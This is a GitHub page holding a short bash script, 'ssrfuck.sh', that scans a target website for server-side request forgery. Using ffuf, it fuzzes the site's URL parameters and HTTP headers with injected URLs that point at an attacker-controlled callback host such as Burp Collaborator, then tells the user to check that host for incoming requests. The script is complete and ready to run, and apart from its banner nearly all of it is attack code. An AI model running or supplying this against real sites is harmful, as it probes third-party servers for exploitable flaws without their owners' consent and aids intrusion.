-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathssrfuck.sh
executable file
·51 lines (34 loc) · 1.33 KB
/
ssrfuck.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env bash
DOMAIN=$1
# Usually your Burp collaborator (without the http/s schema.)
SSRF_CATCHER=$2
# Get the "clean" domain without the schema. This will be used for the ffuf output file name.
DOMAIN_CLEAN=`echo ${DOMAIN} | sed -e 's|^[^/]*//||' -e 's|/.*$||' -e 's/:[0-9]*$//'`
# Cause every bash script needs a banner :D
banner() {
echo -en "\033[31m"
cat << "EOF"
_____ _________________ _
/ ___/ ___| ___ \ ___| | |
\ `--.\ `--.| |_/ / |_ _ _ ___| | __
`--. \`--. \ /| _| | | |/ __| |/ /
/\__/ /\__/ / |\ \| | | |_| | (__| <
\____/\____/\_| \_\_| \__,_|\___|_|\_\
# By 2RS3C (https://twitter.com/2RS3C)
EOF
echo -en "\033[0m"
}
fuzz_params() {
ffuf -w parameters.txt -u "${DOMAIN}?FUZZ=https:%2F%2FFUZZ-${DOMAIN_CLEAN}.${SSRF_CATCHER}" -timeout 3 -o ./ffuf-output/${DOMAIN_CLEAN}-parameters.json >> /dev/null 2>&1
}
fuzz_headers() {
ffuf -w headers.txt -u "${DOMAIN}" -H "FUZZ: http://FUZZ-${DOMAIN_CLEAN}.${SSRF_CATCHER}" -timeout 3 -o ./ffuf-output/${DOMAIN_CLEAN}-headers.json >> /dev/null 2>&1
}
####### Start #######
banner
echo "[-] Fuzzing parameters in ${DOMAIN}."
fuzz_params
echo "[-] Fuzzing headers in ${DOMAIN}."
fuzz_headers
echo "[+] Done fuzzing in ${DOMAIN}."
echo "[+] Check for requests on your server (${SSRF_CATCHER})."